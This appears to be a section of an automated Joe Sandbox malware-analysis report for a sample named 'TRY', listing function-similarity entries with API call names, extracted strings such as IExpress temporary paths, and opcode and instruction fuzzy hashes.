                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                    • String ID: Control Panel\Desktop\ResourceLocale
                                                                    • API String ID: 3346862599-1109908249
                                                                    • Opcode ID: 0ef2e49ea2d523cb0d96e1510a882bc26b5037e292a8015958692e0b2fe72ee1
                                                                    • Instruction ID: f3923563ba619a298b1835c5e17ba6ad09ca1e54ea0871fcefe0e1fc393d27ee
                                                                    • Opcode Fuzzy Hash: 0ef2e49ea2d523cb0d96e1510a882bc26b5037e292a8015958692e0b2fe72ee1
                                                                    • Instruction Fuzzy Hash: D64181B3F01A9087EB508B25E8807D9F7A5F384B64F65513ADA590379CDF78CA46CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                    • API String ID: 4204503880-1888249752
                                                                    • Opcode ID: 64d96d54a73524583d87b63dfc7e8286ae492dfacb74392b1afb45792a249c94
                                                                    • Instruction ID: 9803ef39b5589e243e8558e1da356cad093dbfa9df7af7d4935c55b89ebb2863
                                                                    • Opcode Fuzzy Hash: 64d96d54a73524583d87b63dfc7e8286ae492dfacb74392b1afb45792a249c94
                                                                    • Instruction Fuzzy Hash: DE210CB6A04B4496EB50DF16F45439AF7A0F788BA4F54452DEE8D43B18DF38D646CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                    • String ID:
                                                                    • API String ID: 1051330783-0
                                                                    • Opcode ID: f78638de83485bf910632d144a3a72b8691c3b3d70d5a8fe4b5d167855251055
                                                                    • Instruction ID: 01653a496246ad048296650fd1df0909ebe08bc76bf93aab71f6e7e8d3949018
                                                                    • Opcode Fuzzy Hash: f78638de83485bf910632d144a3a72b8691c3b3d70d5a8fe4b5d167855251055
                                                                    • Instruction Fuzzy Hash: 63517CB2B006918AFF108F25D900BE8B7A5F745BA8F144139DE4963798EB3CDE92C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                    • String ID:
                                                                    • API String ID: 975904313-0
                                                                    • Opcode ID: e1d04261d858ece4703b4c937cc3562b4ed0abf51833e14a07d3450d64b04fd3
                                                                    • Instruction ID: 76b8291a4a66a1dca149f88a563387e6a971d5826c42cb5f95664b49be8604cb
                                                                    • Opcode Fuzzy Hash: e1d04261d858ece4703b4c937cc3562b4ed0abf51833e14a07d3450d64b04fd3
                                                                    • Instruction Fuzzy Hash: 6D418EF1E096C441FF629B25E8243E9EB91A799BB4F484139CADA077CDCA2CC647C711
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                    • String ID:
                                                                    • API String ID: 2212493051-0
                                                                    • Opcode ID: 82eea2d133a119930696c2a32b8ef5d8a93a9560684ae113d9f716f9eb066404
                                                                    • Instruction ID: eca72bf7be73d55a2bf6a4e33a3dc26ce2d02481b586d5b03fab092f99b7f149
                                                                    • Opcode Fuzzy Hash: 82eea2d133a119930696c2a32b8ef5d8a93a9560684ae113d9f716f9eb066404
                                                                    • Instruction Fuzzy Hash: 60317076B205108AF710CBB6E944BDDBB71B348BA9F585139DE0563B4CCA39D646CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                    • String ID: UPDFILE%lu
                                                                    • API String ID: 2922116661-2329316264
                                                                    • Opcode ID: 47e30c68af17bc8e8918541752d0bccbb5525b077b522209f1120021165a2946
                                                                    • Instruction ID: 4ec297a5b0a9a4c1dab8234b13ad713bb0d44b0795bb382370847ef9b83cce76
                                                                    • Opcode Fuzzy Hash: 47e30c68af17bc8e8918541752d0bccbb5525b077b522209f1120021165a2946
                                                                    • Instruction Fuzzy Hash: 10215EB2A04B4083FB509B25E8107DAF7A1EB94FB0F65423A9A69477D9DF3CC646C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                    • String ID:
                                                                    • API String ID: 3370778649-0
                                                                    • Opcode ID: e75314f0317059066ea3fc699c563cfa39b45419fc3ce52d9c4f3efc5764e6ed
                                                                    • Instruction ID: 8d8852f7ca2a521f7deb86b3307507edd47b782c76e4f9ad10efef2e488d82a1
                                                                    • Opcode Fuzzy Hash: e75314f0317059066ea3fc699c563cfa39b45419fc3ce52d9c4f3efc5764e6ed
                                                                    • Instruction Fuzzy Hash: 9A1144B1F05B5082FB186B62E94479EF691A749FE0F04543CDD0A87B9CDE3CCA468700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                    • String ID: wininit.ini
                                                                    • API String ID: 3273605193-4206010578
                                                                    • Opcode ID: 5199a9086dfdbd995451bbaa83a16fce677e21d30420cf1ce0e7fa2ad61c3104
                                                                    • Instruction ID: 9fc5f62eea4a4646749e06c439db6e3cae9baed92c4b5f7c2cbc05b261f244eb
                                                                    • Opcode Fuzzy Hash: 5199a9086dfdbd995451bbaa83a16fce677e21d30420cf1ce0e7fa2ad61c3104
                                                                    • Instruction Fuzzy Hash: 1F111272B1464093FB249B35E8553DAF3A1F7CC764F5441399A5E876ACDE3CC64ACA00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Text$DesktopDialogForegroundItem
                                                                    • String ID: tha
                                                                    • API String ID: 761066910-992520703
                                                                    • Opcode ID: 7b0a0afc9afeab9cd489da0c529037e52088d876d79330b77116ab0ab807e242
                                                                    • Instruction ID: 809d8833c0ef9069e1f881c3a3c96fbfa3c9e9ae988f036505bd463582910d66
                                                                    • Opcode Fuzzy Hash: 7b0a0afc9afeab9cd489da0c529037e52088d876d79330b77116ab0ab807e242
                                                                    • Instruction Fuzzy Hash: E701FBF4E1474086FA695B65E8087F8D691A789BB1F585039C806163ECDF6C8787C621
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 000000013FB64CC0: FindResourceA.KERNEL32 ref: 000000013FB64CE8
                                                                      • Part of subcall function 000000013FB64CC0: SizeofResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64CF3
                                                                      • Part of subcall function 000000013FB64CC0: FindResourceA.KERNEL32 ref: 000000013FB64D13
                                                                      • Part of subcall function 000000013FB64CC0: LoadResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D1E
                                                                      • Part of subcall function 000000013FB64CC0: LockResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D27
                                                                      • Part of subcall function 000000013FB64CC0: memcpy_s.MSVCRT ref: 000000013FB64D40
                                                                      • Part of subcall function 000000013FB64CC0: FreeResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D49
                                                                    • LocalAlloc.KERNEL32(?,?,?,?,00000000,000000013FB630B1), ref: 000000013FB64695
                                                                    • LocalFree.KERNEL32(?,?,?,?,00000000,000000013FB630B1), ref: 000000013FB64725
                                                                      • Part of subcall function 000000013FB64A70: LoadStringA.USER32 ref: 000000013FB64B04
                                                                      • Part of subcall function 000000013FB64A70: MessageBoxA.USER32 ref: 000000013FB64B3E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                    • String ID: <None>$@$FINISHMSG
                                                                    • API String ID: 3507850446-4126004490
                                                                    • Opcode ID: b487ec9568ec1de5c4182c7751c6796abb55c886bfc8e6d40acc34d304059198
                                                                    • Instruction ID: e77032c977a8f85ee0b74d5f6c9782e6d87d22fed50bd3e71df28ccf7aa689dd
                                                                    • Opcode Fuzzy Hash: b487ec9568ec1de5c4182c7751c6796abb55c886bfc8e6d40acc34d304059198
                                                                    • Instruction Fuzzy Hash: 5711BCF6A14B40C3FB209B21F461BEBE291E7857A8F14513D9A4A46B9CDB3DC6468B04
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$AttributesFile
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                    • API String ID: 438848745-2651688815
                                                                    • Opcode ID: c2ef53279d37d8f959e672e600895df1c9bb0d2f273fc07fa29ab4de3b678f32
                                                                    • Instruction ID: 1e979bb31ee609cbbc7059197a968ee27e5a55d6aa88d3eec289f2d3ecd12f71
                                                                    • Opcode Fuzzy Hash: c2ef53279d37d8f959e672e600895df1c9bb0d2f273fc07fa29ab4de3b678f32
                                                                    • Instruction Fuzzy Hash: B81142B1A1568596FF619F10E4503D9F3A0F795768F94023AD69D026E9DF2CC70BC700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                    • String ID:
                                                                    • API String ID: 1273765764-0
                                                                    • Opcode ID: da4bc00c7ae1d23eecce1492ef476764353cfb85bcf844c9ad0217d8cc464016
                                                                    • Instruction ID: 7a47d22f384e5a592d497d9cc9cbd347a10f0e69d3115a61a5bec97db4e3951c
                                                                    • Opcode Fuzzy Hash: da4bc00c7ae1d23eecce1492ef476764353cfb85bcf844c9ad0217d8cc464016
                                                                    • Instruction Fuzzy Hash: B21170B1E00B8481FA609B65F4583D9E350F788FB4F4402399AAA077DDCE3CC2478B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                                    • String ID: tha
                                                                    • API String ID: 2312377310-992520703
                                                                    • Opcode ID: c4e2bbb139771fec0025214002a9c0f5fba9f55d383aab18dc9d0e176869e49b
                                                                    • Instruction ID: 18513c58b01d2b326bec006faef9c7f8cc868746b5d68d2b7da46345dfe407d3
                                                                    • Opcode Fuzzy Hash: c4e2bbb139771fec0025214002a9c0f5fba9f55d383aab18dc9d0e176869e49b
                                                                    • Instruction Fuzzy Hash: D3A1ACF6E102418AFB608F25D4447EAE6A4F7487B4F1D103EE95A8379CD638CA46CB20
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleWrite
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                    • API String ID: 1065093856-552775693
                                                                    • Opcode ID: 2ea8483bcfe6ef949360783779cb8a031befe5a113aea48590acfe97ae481b62
                                                                    • Instruction ID: 9ff877e4734264bc7eb17128548b3c3e33ba6db0aedbd8cf6fe9397eef70f84f
                                                                    • Opcode Fuzzy Hash: 2ea8483bcfe6ef949360783779cb8a031befe5a113aea48590acfe97ae481b62
                                                                    • Instruction Fuzzy Hash: B8318FB271468087EB619F10E8547DAF7A0F7897B8F540239EA9D47698CF7CC60ACB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *MEMCAB
                                                                    • API String ID: 0-3211172518
                                                                    • Opcode ID: 6afdfd805b350688c3602c957db617d8632adc9201ddbe5db9da4816f6311d69
                                                                    • Instruction ID: d7270c8b72b84680a77ab85306004c5903f86e69a4bfad50e219bd88d8f06d33
                                                                    • Opcode Fuzzy Hash: 6afdfd805b350688c3602c957db617d8632adc9201ddbe5db9da4816f6311d69
                                                                    • Instruction Fuzzy Hash: 0C317FB1A14B4485FB508B11E8843D9B3A1B7047B4F90063ED96D423D8EF39C66ACB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                    • String ID:
                                                                    • API String ID: 140117192-0
                                                                    • Opcode ID: 3705a83dead617d7ec271545f917a4e3987cacfa7ba11eb70581d06d55b83e20
                                                                    • Instruction ID: 078b6fc50b23c47f0f8fdc23c04a910eb45161e0aa85a7b84a087f1937d5e5a5
                                                                    • Opcode Fuzzy Hash: 3705a83dead617d7ec271545f917a4e3987cacfa7ba11eb70581d06d55b83e20
                                                                    • Instruction Fuzzy Hash: C541D7F5A05B4482EB509B58F890395F3A4F3897A9FA0413ADA8D83768DF3DC65AC740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                    • String ID:
                                                                    • API String ID: 1214682469-0
                                                                    • Opcode ID: 8af9f5df09fb230a588841b58d700163d72a1dc5bf7f8989bca99a4abbe73bfe
                                                                    • Instruction ID: 1b325de28fb817f69bf8f646540bad45c85b1ca4d29d8509f3b7c56287ba40bc
                                                                    • Opcode Fuzzy Hash: 8af9f5df09fb230a588841b58d700163d72a1dc5bf7f8989bca99a4abbe73bfe
                                                                    • Instruction Fuzzy Hash: 95110DB5B05B4082EE209B12F40479AE6A1F759FF4F584639AE9907BD9DF3CD6428B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                    • String ID:
                                                                    • API String ID: 140117192-0
                                                                    • Opcode ID: 04fa2115b3eb68aec4ea8641280f1283d8aa92b6bb6640a1a0ecb199eb4784e3
                                                                    • Instruction ID: e880d0a5b5f06eaae903bdea3d3e22fc663176c8c79b7a593a8c48e97452aae5
                                                                    • Opcode Fuzzy Hash: 04fa2115b3eb68aec4ea8641280f1283d8aa92b6bb6640a1a0ecb199eb4784e3
                                                                    • Instruction Fuzzy Hash: CC21A4F5A15B4486E7109F55F880389F3A4F389B69F60013ADA8D43768DF7DC65AC740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Prev$Next
                                                                    • String ID:
                                                                    • API String ID: 3260447230-0
                                                                    • Opcode ID: 8f04076bf7384626d75a864c6dfc3af67e08eec1412e220a3fe757313dad08a7
                                                                    • Instruction ID: 438169dae1cb4647ae2c825f63a07c781d9768cef03b810fb3c9791b5924866d
                                                                    • Opcode Fuzzy Hash: 8f04076bf7384626d75a864c6dfc3af67e08eec1412e220a3fe757313dad08a7
                                                                    • Instruction Fuzzy Hash: 7001DDF1E0568082FB514B21E9483A9EE91A349FF0F184274DB66077CDCE1CC9838701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
• Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
Similarity
• API ID: Message$Peek$DispatchMultipleObjectsWait
• String ID:
• API String ID: 2776232527-0
• Opcode ID: 3aee720f3c8c46dcd25b27dd5854f200cc9db310b4e25a0c757932c117ee5bc3
• Instruction ID: 445b835fdf7ccb2a6ddfa9c248a479c414a67b15ee030fcf4c67c97a09eb74c6
• Opcode Fuzzy Hash: 3aee720f3c8c46dcd25b27dd5854f200cc9db310b4e25a0c757932c117ee5bc3
• Instruction Fuzzy Hash: 4F01B5B2B2864187F7B0CF34E884BAAE7A0F794764F445139D646429DCDB78C28ACF10
Uniqueness

Uniqueness Score: -1.00%